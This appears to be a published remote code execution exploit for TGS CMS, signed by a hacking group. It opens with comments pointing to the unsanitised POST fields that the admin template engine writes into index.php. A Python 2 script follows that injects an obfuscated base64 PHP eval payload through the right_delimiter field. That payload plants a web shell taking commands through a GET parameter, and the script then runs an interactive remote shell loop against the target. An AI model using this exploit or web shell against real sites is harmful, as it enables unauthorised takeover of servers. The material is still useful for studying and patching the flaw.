|
# TGS CMS Remote Code Execution Exploit=0D
# by 0in=0D
# from Dark-Coders Group!=0D
# www.dark-coders.pl=0D
# Contact: 0in(dot)email[at]gmail(dot)com=0D
# Greetings to:die_angel,suN8Hclf,m4r1usz,cOndemned,str0ke=0D
# Dork:NULL - because "You cannot kill what you did not create" <- Duality by Slipknot=0D
# Let's analyze the vuln:=0D
# We've got the: /cms/admin/admin.template_engine.php =0D
# first line:"" =0D
# next 2-22 lines - comments=0D
# 23: if ($_GET['option'] == "set_template") { =0D
# 24: $filename = "../index.php";=0D
# 25: if ((@is_writeable($filename)) && ($handle = @fopen($filename, "w"))) {=0D
# From 50 line to 88 we have definition of file content =0D
# 50: $content = 'template_dir = "'.$_POST['template_dir'].'"; =0D
# 78:$tgs_template->config_dir = "'.$_POST['config_dir'].'"; =0D
# 79:$tgs_template->cms_dir = "'.$_POST['cms_dir'].'";=0D
# 80:$tgs_template->left_delimiter = "'.$_POST['left_delimiter'].'";=0D
# 81:$tgs_template->right_delimiter = "'.$_POST['right_delimiter'].'";=0D
# And.. boom!=0D
# 89: if (@fwrite($handle,$content)) {=0D
# Just simply exploit for fun:=0D
import httplib=0D
import urllib=0D
print "TGS CMS Remote Code Execution Exploit"=0D
print "by 0in From Dark-Coders Group"=0D
print "www.dark-coders.pl"=0D
print 'Enter target:'=0D
target=raw_input()=0D
print 'Enter path:'=0D
path=raw_input()=0D
inject="\";error_reporting(0);eval(base64_decode(\"JGNtZD0kX0dFVFsnenVvJ107c3lzdGVtKCRjbWQpO2V4aXQ7\"));//"=0D
exploit=httplib.HTTPConnection(target+':80')=0D
headers={'Content-type':'application/x-www-form-urlencoded',"Accept":"text/plain"}=0D
data=urllib.urlencode({'right_delimiter':inject})=0D
exploit.request("POST",path+"/cms/admin/admin.template_engine.php?option=set_template",data,headers)=0D
print exploit.getresponse().read()=0D
while(1):=0D
cmd=raw_input("[shell@"+target+"]#")=0D
if(cmd=='exit'):=0D
quit()=0D
shell=httplib.HTTPConnection(target+':80')=0D
shell.request("GET",path+"/cms/index.php?zuo="+cmd)=0D
print shell.getresponse().read()=0D
=0D
=0D
=0D
=0D
=0D